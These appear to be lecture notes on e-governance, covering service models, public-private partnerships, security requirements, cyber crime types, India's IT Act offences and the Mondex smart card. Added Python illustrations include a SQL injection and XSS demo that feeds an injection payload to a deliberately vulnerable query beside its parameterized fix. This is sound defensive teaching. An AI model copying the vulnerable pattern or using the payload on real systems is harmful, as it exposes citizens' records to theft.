In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.

G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here, e-Governance tools are used to aid the business community (providers of goods and services) to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G -

Government to business (G2B): Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

- Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
- Generally, but not always, involving:
  o Long Term Contracts
  o User Charges and/or Payments flowing between the Parties
  o Shared Investments, but Mainly Private
  o Risk Sharing by the Parties
- Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?

- Fiscal Head Room
- As a Way of Financing the Project
- Separate Policy & Regulation from Operations
- Make the Good or Service Available
- Pay for Performance and Output
- Introduce Competition: For and In the Market

The Need to Set the Right Priorities -

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:

- Shared goals
- Shared resources (time, money, expertise, people)
- Shared risks
- Shared benefits

Benefits:

- Expedited project completion
- Project cost savings
- Improved quality
- Use of private resources
- Access to new sources of private capital

Two Major Steps:

- Crafting the Partnership
- Implementing the Partnership

Project Management - Six Distinct Phases

1. Genesis
  o What's the need?
  o What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
  o Is there a need for a Public/Private Partnership?
  o Preliminary Project Definition

2. Feasibility
  o Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
  o Market Research
  o Economic/Financial Analysis
  o Program, Budget and Schedule
  o Risk Analysis

3. Plan and Test
  o Final project definition
  o What is the best way to complete the project?
  o Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
  o Master Schedule/Budget
  o Political Climate
  o Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
  o How do you choose and contract with the best-value private partner?
  o What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
  o What do current statutes allow?
  o Procurement Approach: Sole Source, RFP, Low Bid
  o Risk Allocation between Public and Private Partners
  o Structuring of Contract/Risks and Rewards

5. Implement
  o Environmental
  o Design
  o Permitting
  o Construction
  o Commissioning and Administration

6. Operate
  o Startup
  o Monitoring
  o Assessment
  o Enhancement
  o Contract Modifications
  o Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT by citizens and businesses. Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

- understanding an organization's information security requirements and the need to establish policy and objectives for information security;
- implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
- monitoring and reviewing the performance and effectiveness of the ISMS;
- continual improvement based on objective measurement.

Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
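As an added illustration (not part of the original notes), the following Python sketch maps the requirements above onto concrete mechanisms in a small e-Government request handler: salted password hashing for authentication, a role table for authorization, and a keyed, hash-chained audit log that gives integrity and traceability. The user names, roles, actions and keys are constructed for the demo. Confidentiality is left to the transport (TLS) and is not shown, and because a shared HMAC key can be used by anyone who holds it, this log provides integrity and traceability but not non-repudiation, which needs an asymmetric signature made with a key only the actor controls.

```python
import hashlib
import hmac
import json
import secrets

# Constructed demo data: two citizens, one of whom is also a clerk.
# In a real deployment the user store and the audit key live in separate, hardened services.
PBKDF2_ROUNDS = 100_000


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def make_user(password: str, roles: set) -> dict:
    salt = secrets.token_bytes(16)
    return {"salt": salt, "pw": _hash_password(password, salt), "roles": roles}


USERS = {
    "alice": make_user("correct horse", {"citizen"}),
    "bob": make_user("battery staple", {"citizen", "clerk"}),
}

# Authorization policy: which roles may perform which action (constructed).
PERMISSIONS = {
    "view_own_record": {"citizen", "clerk"},
    "edit_record": {"clerk"},
}

AUDIT_KEY = b"constructed-audit-key-change-me"  # assumption: held by the log service only


def authenticate(user: str, password: str) -> bool:
    """Authentication: verify the caller is who they claim to be."""
    record = USERS.get(user)
    if record is None:
        _hash_password(password, b"\0" * 16)  # same cost for unknown users (timing)
        return False
    return hmac.compare_digest(_hash_password(password, record["salt"]), record["pw"])


def authorize(user: str, action: str) -> bool:
    """Authorization: verify the authenticated caller may perform the action."""
    roles = USERS.get(user, {}).get("roles", set())
    return bool(roles & PERMISSIONS.get(action, set()))


class AuditLog:
    """Traceability + integrity: each entry is keyed-hashed together with the tag
    of the previous entry, so editing, deleting or reordering an entry breaks
    the chain from that point on."""

    def __init__(self) -> None:
        self.entries = []          # list of (body bytes, tag bytes)
        self._prev = b"\0" * 32

    def record(self, actor: str, action: str, outcome: str) -> None:
        body = json.dumps(
            {"seq": len(self.entries), "actor": actor, "action": action, "outcome": outcome},
            sort_keys=True,
        ).encode()
        tag = hmac.new(AUDIT_KEY, self._prev + body, "sha256").digest()
        self.entries.append((body, tag))
        self._prev = tag

    def verify(self) -> bool:
        prev = b"\0" * 32
        for body, tag in self.entries:
            expected = hmac.new(AUDIT_KEY, prev + body, "sha256").digest()
            if not hmac.compare_digest(expected, tag):
                return False
            prev = tag
        return True


def handle_request(log: AuditLog, user: str, password: str, action: str) -> str:
    """Authenticate, then authorize, and log every outcome, failures included."""
    if not authenticate(user, password):
        log.record(user, action, "denied-authentication")
        return "denied: authentication"
    if not authorize(user, action):
        log.record(user, action, "denied-authorization")
        return "denied: authorization"
    log.record(user, action, "ok")
    return "ok"


if __name__ == "__main__":
    log = AuditLog()
    print(handle_request(log, "alice", "correct horse", "edit_record"))  # denied: authorization
    print(handle_request(log, "bob", "battery staple", "edit_record"))   # ok
    print(log.verify())                                                   # True
```

Failed attempts are logged as deliberately as successes: the traceability requirement is about reconstructing who tried what, and a log that only records successes hides exactly the events an incident responder needs.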

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and systems software, including input-output units.
• Protecting software applications used to process personal data.
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks.
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data.
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data.

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks use techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
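To make the two vulnerability classes concrete, here is an added Python example (not from the research work cited or from these notes) that puts the vulnerable pattern beside its hardened form on a constructed in-memory SQLite table of citizen records: string-built SQL versus a parameterized query, and raw HTML interpolation versus `html.escape`. The table, its rows and the inputs are constructed for the demo.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed citizen registry with three sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, national_id TEXT, name TEXT)")
    con.executemany(
        "INSERT INTO citizens (national_id, name) VALUES (?, ?)",
        [("A100", "Asha"), ("B200", "Bilal"), ("C300", "Chen")],
    )
    con.commit()
    return con


# --- SQL injection: the 'before' and 'after' of one lookup ---------------------

def lookup_vulnerable(con: sqlite3.Connection, national_id: str) -> list:
    """Builds SQL by string formatting: the input becomes part of the query text,
    so a value containing quote characters changes the meaning of the query."""
    sql = f"SELECT name FROM citizens WHERE national_id = '{national_id}'"
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con: sqlite3.Connection, national_id: str) -> list:
    """Parameterized query: the driver passes the value as data, never as SQL text,
    whatever characters it contains."""
    return [row[0] for row in con.execute(
        "SELECT name FROM citizens WHERE national_id = ?", (national_id,))]


# --- Cross-site scripting: rendering user-controlled text into a page ------------

def render_vulnerable(name: str) -> str:
    """Interpolates raw text into HTML, so markup inside the name is interpreted by the browser."""
    return f"<p>Welcome, {name}</p>"


def render_safe(name: str) -> str:
    """Escapes <, >, & and quotes so the browser displays the text instead of parsing it."""
    return f"<p>Welcome, {html.escape(name)}</p>"


if __name__ == "__main__":
    con = make_db()
    hostile = "' OR '1'='1"   # constructed input that the unsafe query mistakes for SQL
    print(lookup_vulnerable(con, hostile))  # all three names: the WHERE clause became a tautology
    print(lookup_safe(con, hostile))        # []: no citizen has that literal national_id
    print(render_safe("<b>Chen</b>"))       # <p>Welcome, &lt;b&gt;Chen&lt;/b&gt;</p>
```

The fix in both cases is the same principle: keep data and code on separate channels (bound parameters for SQL, output encoding for HTML) rather than trying to filter "bad" characters out of the input.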

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms and industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:

• 121 Million Internet Users
• 65 Million Active Internet Users, up by 28% from 51 million in 2010
• 50 Million users shop online on Ecommerce and Online Shopping Sites
• 46+ Million Social Network Users
• 346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

• any information that is grossly offensive or has menacing character; or
• any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions -

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences -

Section | Offence | Punishment

65 | Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years or/and with fine up to 2 lakh rupees

66 | Hacking | Imprisonment up to three years or/and with fine up to 5 lakh rupees

66-A | Sending offensive message through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms -

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


Why Smart Cards -

• Improve the convenience and security of any transaction
• Provide tamper-proof storage of user and account identity
• Provide vital components of system security
• Protect against a full range of security threats

Advantages -

• Flexibility
• Security
• Portability
• Increasing data storage capacity
• Reliability

Schematic overview of a smart card

Smart card Processing

Smart Card Applications -

• Ticketless travel
  o Seoul bus system: 4M cards, 1B transactions since 1996
  o Planned for the SF Bay Area system
• Authentication, ID
• Medical records
• Ecash
• Store loyalty programs
• Personal profiles
• Government
  o Licenses
• Mall parking
• Example: Mondex

OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

• Direct transfer of electronic money between two cards
• Transfer of electronic money over the Internet or telephone networks, etc.
• Keep transaction records
• Password protection and "lock card" functions
• Portable balance finder to check balance
• Support multiple currencies

ADVANTAGES

CONSUMER -

• Convenience
• Accessibility
• On-chip record of recent transactions
• Home load
• Internet purchases

MERCHANT -

• Reliable off-line payment
• Higher security
• Low transaction cost
• Reduced cash handling

FINANCIAL INSTITUTION -

• Strengthen customer relationships
• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? -

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information:

o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information:

o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate:

o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information:

o firewalls in Multos, between applications (ITSEC 6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system

The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 - two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
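The overflow problem described above can be made concrete with a small simulation. This is an added example, not Mondex's design or code: the card holds a rolling log of ten transactions (the figure quoted in the privacy notes above), value lives on the card so payments are offline, and the bank only learns of a transaction when the card next uploads. The sequence numbers, card identifiers, amounts and the bank-side gap check are constructed for the demo; the `strict` option shows one mitigation, refusing further offline payments once the un-uploaded log is full.

```python
from collections import deque

# Rolling log size quoted in the notes above (assumption: counted in entries, not bytes).
LOG_CAPACITY = 10


class Card:
    """A purse card: value and the transaction log live on the card, so a payment
    needs no contact with the bank."""

    def __init__(self, card_id: str, balance: int = 0, strict: bool = False) -> None:
        self.card_id = card_id
        self.balance = balance                   # minor units, so no float rounding
        self.log = deque(maxlen=LOG_CAPACITY)    # oldest entry is silently dropped when full
        self.seq = 0                             # per-card transaction counter
        self.pending = 0                         # entries written since the last upload
        self.strict = strict                     # mitigation: refuse offline use when log is full

    def _check_capacity(self) -> None:
        if self.strict and self.pending >= LOG_CAPACITY:
            raise RuntimeError(f"{self.card_id}: log full, contact bank before further offline use")

    def _append(self, counterparty: str, amount: int) -> None:
        self.seq += 1
        self.log.append((self.seq, self.card_id, counterparty, amount))
        self.pending += 1

    def pay(self, payee: "Card", amount: int) -> None:
        """Offline card-to-card transfer; both cards record it under their own sequence number."""
        if amount <= 0 or amount > self.balance:
            raise ValueError("insufficient value on card")
        self._check_capacity()      # both sides refuse before any value moves
        payee._check_capacity()
        self._append(payee.card_id, -amount)
        payee._append(self.card_id, amount)
        self.balance -= amount
        payee.balance += amount

    def upload(self, bank: "Bank") -> None:
        """Next ATM or retailer contact: the bank receives whatever still survives on the card."""
        bank.receive(self.card_id, list(self.log))
        self.pending = 0


class Bank:
    """Reconstructs each card's history from uploads and looks for sequence gaps."""

    def __init__(self) -> None:
        self.history = {}   # card_id -> {seq: entry}

    def receive(self, card_id: str, entries: list) -> None:
        self.history.setdefault(card_id, {}).update({e[0]: e for e in entries})

    def missing_sequences(self, card_id: str) -> list:
        """Sequence numbers never received: transactions lost to log overflow before upload.
        Any gap means the bank cannot fully reconcile that card's spending."""
        seen = self.history.get(card_id, {})
        if not seen:
            return []
        return [s for s in range(1, max(seen) + 1) if s not in seen]


def simulate(n_payments: int, strict: bool = False) -> tuple:
    """n offline payments of 100 from a purse to a shop card, then one upload each.
    Returns (the bank's gap list for the purse, total value in circulation)."""
    bank = Bank()
    purse = Card("C1", balance=5000, strict=strict)
    shop = Card("C2", strict=strict)
    for _ in range(n_payments):
        purse.pay(shop, 100)
    purse.upload(bank)
    shop.upload(bank)
    return bank.missing_sequences("C1"), purse.balance + shop.balance


if __name__ == "__main__":
    print(simulate(8))    # ([], 5000): everything reached the bank
    print(simulate(12))   # ([1, 2], 5000): two transactions were overwritten before upload
```

Value is conserved in both runs, so the loss is not money but evidence: with twelve payments before the next upload, the bank sees entries 3 to 12 and can prove only that something is missing, not what. The strict variant trades convenience for auditability by forcing a bank contact before the eleventh offline payment.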

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available - government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance -

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, as a congruent definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met with. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

